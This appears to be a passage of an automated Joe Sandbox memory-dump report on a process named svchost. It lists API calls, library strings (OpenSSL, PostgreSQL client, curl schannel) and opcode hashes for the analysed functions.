                                                                                            APIs
                                                                                            • ERR_new.LIBCRYPTO-3-X64(00000000,00007FFDA3623D8B,00000000,00007FFDA360ABE9,?,?,?,?,?,00007FFDA360AB6E), ref: 00007FFDA3612F7F
                                                                                            • ERR_set_debug.LIBCRYPTO-3-X64(00000000,00007FFDA3623D8B,00000000,00007FFDA360ABE9,?,?,?,?,?,00007FFDA360AB6E), ref: 00007FFDA3612F97
                                                                                            • ERR_set_error.LIBCRYPTO-3-X64(00000000,00007FFDA3623D8B,00000000,00007FFDA360ABE9,?,?,?,?,?,00007FFDA360AB6E), ref: 00007FFDA3612FA8
                                                                                            • CRYPTO_THREAD_run_once.LIBCRYPTO-3-X64(00000000,00007FFDA3623D8B,00000000,00007FFDA360ABE9,?,?,?,?,?,00007FFDA360AB6E), ref: 00007FFDA3612FE7
                                                                                            • CRYPTO_THREAD_run_once.LIBCRYPTO-3-X64(00000000,00007FFDA3623D8B,00000000,00007FFDA360ABE9,?,?,?,?,?,00007FFDA360AB6E), ref: 00007FFDA3613012
                                                                                            • CRYPTO_THREAD_run_once.LIBCRYPTO-3-X64(00000000,00007FFDA3623D8B,00000000,00007FFDA360ABE9,?,?,?,?,?,00007FFDA360AB6E), ref: 00007FFDA361303B
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451563505.00007FFDA3601000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FFDA3600000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451531136.00007FFDA3600000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451655757.00007FFDA3690000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451689034.00007FFDA36BD000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451714646.00007FFDA36C1000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3600000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: D_run_once$R_newR_set_debugR_set_error
                                                                                            • String ID: OPENSSL_init_ssl$ssl\ssl_init.c
                                                                                            • API String ID: 3879570137-538246785
                                                                                            • Opcode ID: e3496e332020ca9c6fe1bb8cde3ecf2beeb22889fd1d9285841be6b611d3b505
                                                                                            • Instruction ID: 1162c579a6cfa829f0bfe3892d441663b11ad716c9af685cca5ae81c6f9ffb92
                                                                                            • Opcode Fuzzy Hash: e3496e332020ca9c6fe1bb8cde3ecf2beeb22889fd1d9285841be6b611d3b505
                                                                                            • Instruction Fuzzy Hash: C7314121B0A10387FB449719E8757B56293AF98380F5C7035D80EA33E7DE2EE945C608
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451099495.00007FFD94691000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFD94690000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451064532.00007FFD94690000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451208341.00007FFD94753000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451387269.00007FFD948AA000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451421580.00007FFD948AD000.00000008.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451454324.00007FFD948AE000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                            • Associated: 0000002A.00000002.3451495194.00007FFD948B2000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffd94690000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                            • String ID:
                                                                                            • API String ID: 1617910340-0
                                                                                            • Opcode ID: c58fbda7aea8831e34ac238b45014ac4bd6a023c821147c20068f492f0d5de91
                                                                                            • Instruction ID: b5e09a286928f103a6ff16b169f76971e2061fb5c90a13075beef9c564decc07
                                                                                            • Opcode Fuzzy Hash: c58fbda7aea8831e34ac238b45014ac4bd6a023c821147c20068f492f0d5de91
                                                                                            • Instruction Fuzzy Hash: F3C1B232B24A45C6EB20CFB8C4A02BD3762F74AB94F149235DA1E5B796DF38D451C780

Control-flow Graph (rendered graph omitted; executed vs. not-executed block colouring is not recoverable from the text)
• Basic blocks: 7ffda36d3bc7 through 7ffda36d4e02
• Imported calls in graph: free, socket, WSAGetLastError, setsockopt, connect, strtol, _strdup, _errno, isspace
• Internal calls in graph: 7ffda36f4cf0, 7ffda36d90d0, 7ffda36ec450, 7ffda36e2d70, 7ffda36f3980, 7ffda36f6230, 7ffda36da920, 7ffda36dafa0, 7ffda36d6990
APIs
Strings
Memory Dump Source
• Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
• Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
Similarity
• API ID: ErrorLast_strdupfreesocket
• String ID: %s(%s) failed: error code %d$SIO_KEEPALIVE_VALS$WSAIoctl$could not create socket: %s$could not set socket to TCP no delay mode: %s$could not set socket to nonblocking mode: %s$invalid integer value "%s" for connection option "%s"$keepalives parameter must be an integer$keepalives_idle$keepalives_interval$tcp_user_timeout
• API String ID: 3112834638-675630034
• Opcode ID: 8cd08dfe8031b0aaf4a845d97061ffdad2b2a9228fa88f5f927dcb7eefd18dce
• Instruction ID: db277ec526c0e442758bc53a2caa8fc617eac54f2b214cea69e65077eef97b99
• Opcode Fuzzy Hash: 8cd08dfe8031b0aaf4a845d97061ffdad2b2a9228fa88f5f927dcb7eefd18dce
• Instruction Fuzzy Hash: 69F1A123B0AA8282F7518F25D4602B833A2FB44B84F5C6131EE4E67396DF3EE585C714

Control-flow Graph (rendered graph omitted; executed vs. not-executed block colouring is not recoverable from the text)
• Basic blocks: 682814a0 through 68281910
• Imported calls in graph: strcmp, pthread_rwlock_unlock, pthread_rwlock_wrlock, strlen, malloc, memcpy, abort, _strdup, free
• Internal calls in graph: 682814a0 (recursive), 682849a0
APIs
Strings
Memory Dump Source
• Source File: 0000002A.00000002.3448609471.0000000068281000.00000020.00000001.01000000.00000011.sdmp, Offset: 68280000, based on PE: true
• Associated: 0000002A.00000002.3448572682.0000000068280000.00000002.00000001.01000000.00000011.sdmp
• Associated: 0000002A.00000002.3448659941.0000000068296000.00000004.00000001.01000000.00000011.sdmp
• Associated: 0000002A.00000002.3448701021.0000000068297000.00000002.00000001.01000000.00000011.sdmp
• Associated: 0000002A.00000002.3448746996.00000000682A0000.00000002.00000001.01000000.00000011.sdmp
• Associated: 0000002A.00000002.3448790248.00000000682A1000.00000004.00000001.01000000.00000011.sdmp
• Associated: 0000002A.00000002.3448830797.00000000682A4000.00000008.00000001.01000000.00000011.sdmp
• Associated: 0000002A.00000002.3448868542.00000000682A5000.00000002.00000001.01000000.00000011.sdmp
• Associated: 0000002A.00000002.3448868542.00000000682EC000.00000002.00000001.01000000.00000011.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_68280000_svchost.jbxd
Similarity
• API ID: strcmp$_strdupfree$abortmallocmemcpystrlen$pthread_rwlock_unlockpthread_rwlock_wrlock
• String ID: 8`)h$pq)h
• API String ID: 1031399696-283867673
• Opcode ID: cb983b356597ae51a9f56790f2f6bd878aa87684a455ba1a6645e18326cee76a
• Instruction ID: 5793e577236a2a3729ad3064a16418873e0c77d2e3cfaac9fddc10f9c11526e5
• Opcode Fuzzy Hash: cb983b356597ae51a9f56790f2f6bd878aa87684a455ba1a6645e18326cee76a
• Instruction Fuzzy Hash: 79A1CEA670579E85EF199F17A90476923A5BB45BC9FC88029DE7A477C0EF38C0D8C300

Control-flow Graph (rendered graph omitted; executed vs. not-executed block colouring is not recoverable from the text)
• Basic blocks: 7ffda36d3552 through 7ffda36d4e02
• Imported calls in graph: free, memset, _errno, strtol, isspace, calloc, memcpy
• Internal calls in graph: 7ffda36e2370, 7ffda36f6230, 7ffda36d63c0, 7ffda36dae50, 7ffda36de5f0, 7ffda36e2d70, 7ffda36f1830, 7ffda36ee100, 7ffda36f48a0, 7ffda36ee290, 7ffda36eea30
APIs
Strings
Memory Dump Source
• Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
• Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
• Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
• Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
Similarity
• API ID: _errno$callocfreeisspacelibintl_dgettextmemcpymemsetstrtol
• String ID: %s/.s.PGSQL.%d$28P01$57P03$Unix-domain socket path "%s" is too long (maximum %d bytes)$could not parse network address "%s": %s$could not translate Unix-domain socket path "%s" to address: %s$could not translate host name "%s" to address: %s$invalid connection state %d, probably indicative of memory corruption$invalid integer value "%s" for connection option "%s"$invalid port number: "%s"$out of memory$port$server is not in hot standby mode$session is not read-only
• API String ID: 3976168012-2457897468
• Opcode ID: e99a948e3e2966eeb5d8dbe08875eb7888184e898622aa97968327e95bb97c1c
• Instruction ID: 4479073ad8b0b209a592ad6b2e5f2dbadebb7f29bf8c6a2fafa4b159e6fe2762
• Opcode Fuzzy Hash: e99a948e3e2966eeb5d8dbe08875eb7888184e898622aa97968327e95bb97c1c
• Instruction Fuzzy Hash: A312B023B0AA8286F7518F25D4603FC2762FB54B88F586231DE4E27796DF3AE185C704

                                                                                            Control-flow Graph
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451913259.00007FFDA3731000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA3730000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451887673.00007FFDA3730000.00000002.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3451974814.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3452007956.00007FFDA37B2000.00000004.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3452031761.00007FFDA37B3000.00000008.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3452057925.00007FFDA37B4000.00000004.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3452090007.00007FFDA37B6000.00000002.00000001.01000000.0000000C.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3730000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: Certmalloc$CertificateContextFreefreememmove$ErrorLastNameString_errnomemsetrealloc
                                                                                            • String ID: SSL: failed retrieving public key from server certificate$SSL: public key does not match pinned public key$schannel: %s$schannel: Failed to read remote certificate context: %s$schannel: SNI or certificate check failed: %s$schannel: failed to receive handshake, SSL/TLS connection failed$schannel: failed to send next handshake data: sent %zd of %lu bytes$schannel: next InitializeSecurityContext failed: %s$schannel: unable to allocate memory$schannel: unable to re-allocate memory
                                                                                            • API String ID: 726578228-413892695
                                                                                            • Opcode ID: 1370aeb09722761c115d09812e566dbe39503a4e3c33be558194c66d30682ad3
                                                                                            • Instruction ID: 71af71d38315d805af60da646f231119a71ad9ba7979fdad1dd666c804642729
                                                                                            • Opcode Fuzzy Hash: 1370aeb09722761c115d09812e566dbe39503a4e3c33be558194c66d30682ad3
                                                                                            • Instruction Fuzzy Hash: 0A027E72B0A78686EB60CF16E4643A977E2FB44784F404036DA4E67B96DF7EE580C704

                                                                                            Control-flow Graph
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLastR_get_error$E_finishE_freeL_get_errorR_clear_errorS_methodX509_freeX_newfree
                                                                                            • String ID: SSL SYSCALL error: %s$SSL SYSCALL error: EOF detected$SSL error: %s$SSL error: certificate verify failed: %s$TLSv1$TLSv1.3$This may indicate that the server does not support any SSL protocol version between %s and %s.$certificate could not be obtained: %s$out of memory allocating error description$system$unrecognized SSL error code: %d
                                                                                            • API String ID: 2649262036-2362506927
                                                                                            • Opcode ID: 0f4d164b573ed57c619845cad48045907740d817cd1e58aedd085b45466e4b7a
                                                                                            • Instruction ID: d5167ad201cfd283af58a6f58ad6a083eefedb3dc1afba51154c8751778a82e2
                                                                                            • Opcode Fuzzy Hash: 0f4d164b573ed57c619845cad48045907740d817cd1e58aedd085b45466e4b7a
                                                                                            • Instruction Fuzzy Hash: 3181D025F1FA5740FA18AB7594352B912C3AF46B80F2C3435D90E6B3D7EE2EE4498348

                                                                                            Control-flow Graph
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451913259.00007FFDA3731000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA3730000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451887673.00007FFDA3730000.00000002.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3451974814.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3452007956.00007FFDA37B2000.00000004.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3452031761.00007FFDA37B3000.00000008.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3452057925.00007FFDA37B4000.00000004.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3452090007.00007FFDA37B6000.00000002.00000001.01000000.0000000C.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3730000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast_errno
                                                                                            • String ID: %s (0x%08X)$%s (0x%08X) - %s$CRYPT_E_NOT_IN_REVOCATION_DATABASE$CRYPT_E_NO_REVOCATION_CHECK$CRYPT_E_NO_REVOCATION_DLL$CRYPT_E_REVOCATION_OFFLINE$CRYPT_E_REVOKED$No error$SEC_E_ILLEGAL_MESSAGE (0x%08X) - This error usually occurs when a fatal SSL/TLS alert is received (e.g. handshake failed). More detail may be available in the Windows System event log.$SEC_I_CONTINUE_NEEDED$Unknown error
                                                                                            • API String ID: 3939687465-2168394622
                                                                                            • Opcode ID: feee24e5bed6a7ee7a67841cdcdd34cb7299311857997a203c2e954a48a94822
                                                                                            • Instruction ID: 19d5e0c900b9da0d0069bd8debc671c80b82451fb73c9e6f75bbd334b103bc15
                                                                                            • Opcode Fuzzy Hash: feee24e5bed6a7ee7a67841cdcdd34cb7299311857997a203c2e954a48a94822
                                                                                            • Instruction Fuzzy Hash: 4851C121F0F682D9FA658B0494B42B97263BF89784F980435D90E223A3EF7EF545D609

                                                                                            Control-flow Graph
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451913259.00007FFDA3731000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA3730000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451887673.00007FFDA3730000.00000002.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3451974814.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3452007956.00007FFDA37B2000.00000004.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3452031761.00007FFDA37B3000.00000008.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3452057925.00007FFDA37B4000.00000004.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3452090007.00007FFDA37B6000.00000002.00000001.01000000.0000000C.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3730000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: ConditionMask$AddressHandleInfoModuleProcVerifyVersionmemmove$ErrorLast_errnocallocfreememset
                                                                                            • String ID: ALPN: curl offers %s$Error setting ALPN$ntdll$schannel: SNI or certificate check failed: %s$schannel: Windows version is old and may not be able to connect to some servers due to lack of SNI, algorithms, etc.$schannel: failed to send initial handshake data: sent %zd of %lu bytes$schannel: initial InitializeSecurityContext failed: %s$schannel: this version of Windows is too old to support certificate verification via CA bundle file.$schannel: unable to allocate memory$schannel: using IP address, SNI is not supported by OS.$wine_get_version
                                                                                            • API String ID: 3185706071-3097429119
                                                                                            • Opcode ID: a88905b97132a0f103da4ae54ce882051c2e5ca5273eef927e76702f8f95584c
                                                                                            • Instruction ID: 9fff33886e849e3aa1b31576a001c679b72e2898deed0575372ca5451bd2b1da
                                                                                            • Opcode Fuzzy Hash: a88905b97132a0f103da4ae54ce882051c2e5ca5273eef927e76702f8f95584c
                                                                                            • Instruction Fuzzy Hash: 8EC1A136B0A74286FB10DB21E4642AE77A6FB44788F004036DE4D27B5ADF3EE595C708
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451913259.00007FFDA3731000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA3730000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451887673.00007FFDA3730000.00000002.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3451974814.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3452007956.00007FFDA37B2000.00000004.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3452031761.00007FFDA37B3000.00000008.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3452057925.00007FFDA37B4000.00000004.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3452090007.00007FFDA37B6000.00000002.00000001.01000000.0000000C.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3730000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: CounterPerformanceQuery
                                                                                            • String ID: %s assess started=%d, result=%d$%s connect -> %d, connected=%d$%s connect timeout after %lldms, move on!$%s done$%s starting (timeout=%lldms)$%s trying next$Connection timeout after %lld ms$Failed to connect to %s port %u after %lld ms: %s$all eyeballers failed
                                                                                            • API String ID: 2783962273-3359130258
                                                                                            • Opcode ID: cc7d656516ac663056c557af6d5954c1dd54e1b3f91d78df4648890ba3a266a5
                                                                                            • Instruction ID: fabd406a7d5ec20dc5fbad8ce2c1de0de53d73a3a5d240ad0ec849bdae0cf3d6
                                                                                            • Opcode Fuzzy Hash: cc7d656516ac663056c557af6d5954c1dd54e1b3f91d78df4648890ba3a266a5
                                                                                            • Instruction Fuzzy Hash: 7032D022B0A6868AFB198F74C5602BC33A2FB04B98F144235DE5D77796DF39E551C344
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451913259.00007FFDA3731000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA3730000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451887673.00007FFDA3730000.00000002.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3451974814.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3452007956.00007FFDA37B2000.00000004.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3452031761.00007FFDA37B3000.00000008.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3452057925.00007FFDA37B4000.00000004.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3452090007.00007FFDA37B6000.00000002.00000001.01000000.0000000C.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3730000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _strdup$callocfreestrncmp
                                                                                            • String ID: Could not resolve host: %s$Couldn't resolve proxy '%s'$Failed to resolve host '%s' with timeout after %lld ms$Unix socket path too long: '%s'$localhost/
                                                                                            • API String ID: 349811053-652210993
                                                                                            • Opcode ID: 1b9ca34e3b3f2d4686301eafdf596b673b5f06633424a2ef55324309f437c312
                                                                                            • Instruction ID: fad57c858def9bce7755384dd1d6bb6fbf6bc6000cd551047baecf3a6b767faa
                                                                                            • Opcode Fuzzy Hash: 1b9ca34e3b3f2d4686301eafdf596b673b5f06633424a2ef55324309f437c312
                                                                                            • Instruction Fuzzy Hash: 41712821B0AB9687FBA88B24D0613B973A2FB44784F444035DF8D67786DF2EE894C714
                                                                                            APIs
                                                                                            • LoadLibraryExW.KERNEL32(?,?,00000000,00007FFD94737E16,?,?,?,00007FFD94737D99), ref: 00007FFD947377CD
                                                                                            • GetLastError.KERNEL32(?,?,00000000,00007FFD94737E16,?,?,?,00007FFD94737D99), ref: 00007FFD947377DF
                                                                                            • LoadLibraryExW.KERNEL32(?,?,00000000,00007FFD94737E16,?,?,?,00007FFD94737D99), ref: 00007FFD94737821
                                                                                            • VirtualProtect.KERNEL32 ref: 00007FFD9473787D
                                                                                            • VirtualProtect.KERNEL32 ref: 00007FFD947378AE
                                                                                            • FreeLibrary.KERNEL32(?,?,00000000,00007FFD94737E16,?,?,?,00007FFD94737D99), ref: 00007FFD947378F2
                                                                                            • GetProcAddressForCaller.KERNELBASE(?,?,00000000,00007FFD94737E16,?,?,?,00007FFD94737D99), ref: 00007FFD947378FE
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451099495.00007FFD94691000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FFD94690000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451064532.00007FFD94690000.00000002.00000001.01000000.0000000B.sdmp
                                                                                            • Associated: 0000002A.00000002.3451208341.00007FFD94753000.00000002.00000001.01000000.0000000B.sdmp
                                                                                            • Associated: 0000002A.00000002.3451387269.00007FFD948AA000.00000004.00000001.01000000.0000000B.sdmp
                                                                                            • Associated: 0000002A.00000002.3451421580.00007FFD948AD000.00000008.00000001.01000000.0000000B.sdmp
                                                                                            • Associated: 0000002A.00000002.3451454324.00007FFD948AE000.00000004.00000001.01000000.0000000B.sdmp
                                                                                            • Associated: 0000002A.00000002.3451495194.00007FFD948B2000.00000002.00000001.01000000.0000000B.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffd94690000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: Library$LoadProtectVirtual$AddressCallerErrorFreeLastProc
                                                                                            • String ID: AppPolicyGetProcessTerminationMethod$api-ms-$ext-ms-
                                                                                            • API String ID: 983678269-1880043860
                                                                                            • Opcode ID: 19b8e87cf9301367cd08217d46230329f98ca96a54b7e9c7c7eddbc50712cf40
                                                                                            • Instruction ID: 525d37096328817e01be6df9acd1d799f2121f47815d267bd0fdf350f0b1a2da
                                                                                            • Opcode Fuzzy Hash: 19b8e87cf9301367cd08217d46230329f98ca96a54b7e9c7c7eddbc50712cf40
                                                                                            • Instruction Fuzzy Hash: 15518E21B0960ED5EA349BA6A8B05B57250AF4ABB0F58C734DE3D477D2EE2CE405C280
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: _errno$Last$Status$CloseHandle$AttributesErrorFile
                                                                                            • String ID:
                                                                                            • API String ID: 2758595869-0
                                                                                            • Opcode ID: d3df3df46ebeed910f37aa43a7ceb0c59825b7abfe0e09809676aeb9f0070ec4
                                                                                            • Instruction ID: 81b0519d0032ac60fdc88b4c3e8217c9b6ef4da793ff19728cab90a3a37eb696
                                                                                            • Opcode Fuzzy Hash: d3df3df46ebeed910f37aa43a7ceb0c59825b7abfe0e09809676aeb9f0070ec4
                                                                                            • Instruction Fuzzy Hash: 35512862B0FA4241F6254B25A82037A7292BF84734F6C6330EA6D677D3DF3EE4408718
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451764609.00007FFDA36D1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFDA36D0000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451740549.00007FFDA36D0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451805412.00007FFDA36F8000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451839464.00007FFDA371E000.00000004.00000001.01000000.0000000D.sdmp
                                                                                            • Associated: 0000002A.00000002.3451862794.00007FFDA371F000.00000002.00000001.01000000.0000000D.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda36d0000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: malloc$ErrorLastStartupmemset
                                                                                            • String ID:
                                                                                            • API String ID: 4264553866-3916222277
                                                                                            • Opcode ID: 1eb9eac38619ae2fec4c05c8e52c438f0655d36f69953d05abc5c18994f70308
                                                                                            • Instruction ID: 171d3acdac9b1ba98a1b24bd97eaeada4e89f4d5ccb22942e2423cdc1dcb1f86
                                                                                            • Opcode Fuzzy Hash: 1eb9eac38619ae2fec4c05c8e52c438f0655d36f69953d05abc5c18994f70308
                                                                                            • Instruction Fuzzy Hash: 1641537270AB8186F7558F20E4693B923A5FB05B88F4C1139DE4D2A3D6DF7E91458318
                                                                                            APIs
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000002A.00000002.3451913259.00007FFDA3731000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FFDA3730000, based on PE: true
                                                                                            • Associated: 0000002A.00000002.3451887673.00007FFDA3730000.00000002.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3451974814.00007FFDA3797000.00000002.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3452007956.00007FFDA37B2000.00000004.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3452031761.00007FFDA37B3000.00000008.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3452057925.00007FFDA37B4000.00000004.00000001.01000000.0000000C.sdmp
                                                                                            • Associated: 0000002A.00000002.3452090007.00007FFDA37B6000.00000002.00000001.01000000.0000000C.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_42_2_7ffda3730000_svchost.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$connect
                                                                                            • String ID: connect to %s port %u from %s port %d failed: %s$connected$local address %s port %d...$not connected yet
                                                                                            • API String ID: 375857812-3816509080
                                                                                            • Opcode ID: 81808cecde148e0314505d5bbdb3587760bc8037fb71c53ef54272281857020f
                                                                                            • Instruction ID: 813bada5fecc3fd054512e79c3d9b0d38fd8191ff24a5054c2ae97c0b286f497
                                                                                            • Opcode Fuzzy Hash: 81808cecde148e0314505d5bbdb3587760bc8037fb71c53ef54272281857020f
                                                                                            • Instruction Fuzzy Hash: 7B61E022B09A8281FBA49B35D4607F93362AB45BA4F544232DE6C1B7D7DF3EE445C304
